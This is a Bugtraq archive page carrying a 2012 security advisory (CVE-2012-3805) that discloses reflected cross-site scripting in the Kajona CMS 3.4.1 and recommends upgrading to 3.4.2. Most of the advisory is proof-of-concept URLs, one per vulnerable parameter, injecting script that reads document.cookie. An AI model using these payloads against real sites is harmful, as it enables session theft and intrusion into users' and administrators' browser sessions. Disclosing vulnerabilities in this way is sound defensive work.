[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple Cross-Site Scripting (XSS) in Kajona

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple Cross-Site Scripting (XSS) in Kajona
From: advisory@xxxxxxxxxxxx
Date: Wed, 11 Jul 2012 13:18:59 +0200 (CEST)
Advisory ID: HTB23097
Product: Kajona
Vendor: www.kajona.de
Vulnerable Version(s): 3.4.1 and probably prior
Tested Version: 3.4.1
Vendor Notification: 20 June 2012 
Vendor Patch: 26 June 2012 
Public Disclosure: 11 July 2012 
Vulnerability Type: Cross-Site Scripting (XSS)
CVE Reference: CVE-2012-3805
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Risk Level: Medium 
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple Cross-Site 
Scripting (XSS) vulnerabilities in Kajona. 


1) Multiple Cross-Site Scripting (XSS) in Kajona: CVE-2012-3805

1.1 Input passed via the "absender_name", "absender_email" and 
"absender_nachricht" GET parameters to /index.php (when "page" is set to 
"contact") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's 
browser session in context of affected website.

The following PoC (Proof of Concept) demonstrate the vulnerabilities:


http://kajona/index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=contact&absender_nachricht=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.2 Input passed via the "comment_name", "comment_subject" and 
"comment_message" GET parameters to /index.php (when "page" is set to 
"postacomment") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's 
browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?page=postacomment&comment_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacomment&comment_message=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.3 Input passed via the "module" GET parameter to /index.php is not properly 
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's 
browser session in context of affected website.

The following PoC demonstrates the vulnerability:


http://kajona/index.php?module=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.4 Input passed via the "action" GET parameter to /index.php (when "module" is 
set to "login" and "admin" is set to "1") is not properly sanitised before 
being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's 
browser session in context of affected website.

The following PoC demonstrates the vulnerability:


http://kajona/index.php?module=login&admin=1&action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.5 Input passed via the "pv" and "pe" GET parameters to /index.php (when 
"module" is set to "user", "action" is set to "list" and "admin" is set to "1") 
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=user&action=list&pv=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=list&pe=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.6 Input passed via the "user_username", "user_email", "user_forename", 
"user_name", "user_street", "user_postal", "user_city", "user_tel" and 
"user_mobile" GET parameters to /index.php (when "module" is set to "user", 
"action" is set to "newUser" and "admin" is set to "1") is not properly 
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=user&action=newUser&user_username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_postal=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_tel=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.7 Input passed via the "group_name" and "group_desc" GET parameters to 
/index.php (when "module" is set to "user", "action" is set to "groupNew" and 
"admin" is set to "1") is not properly sanitised before being returned to the 
user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=user&action=groupNew&group_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.8 Input passed via the "name", "browsername", "seostring", "keywords" and 
"folder_id" GET parameters to /index.php (when "module" is set to "pages", 
"action" is set to "newPage" and "admin" is set to "1") is not properly 
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=pages&action=newPage&name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&keywords=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.9 Input passed via the "element_name" and "element_cachetime" GET parameters 
to /index.php (when "module" is set to "pages", "action" is set to "newElement" 
and "admin" is set to "1") is not properly sanitised before being returned to 
the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.10 Input passed via the "aspect_name" GET parameter to /index.php (when 
"module" is set to "system", "action" is set to "newAspect" and "admin" is set 
to "1") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrates the vulnerability:


http://kajona/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.11 Input passed via the "filemanager_name", "filemanager_path", 
"filemanager_upload_filter" and "filemanager_view_filter" GET parameters to 
/index.php (when "module" is set to "filemanager", "action" is set to "newRepo" 
and "admin" is set to "1") is not properly sanitised before being returned to 
the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



1.12 Input passed via the "archive_title" and "archive_path" GET parameters to 
/index.php (when "module" is set to "downloads", "action" is set to 
"newArchive" and "admin" is set to "1") is not properly sanitised before being 
returned to the user.
This can be exploited to execute arbitrary HTML and script code in 
administrator's browser session in context of affected website.

The following PoC demonstrate the vulnerabilities:


http://kajona/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=downloads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Kajona V3.4.2

More Information:
http://www.kajona.de/newsdetails.Kajona-V3-4-2-available.newsDetail.616decb4fe9b7a5929fb.en.html
http://www.kajona.de/changelog_34x.de.html

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23097 - 
https://www.htbridge.com/advisory/HTB23097 - Cross-Site Scripting (XSS) in 
Kajona.
[2] Kajona - http://www.kajona.de/ - Open Source Content Management Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
Prev by Date: Re: CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Next by Date: Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Recording Server
Previous by thread: Re: CitrusDB 2.4.1 - LFI/SQLi Vulnerability
Next by thread: Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence Recording Server
Index(es):
- Date
- Thread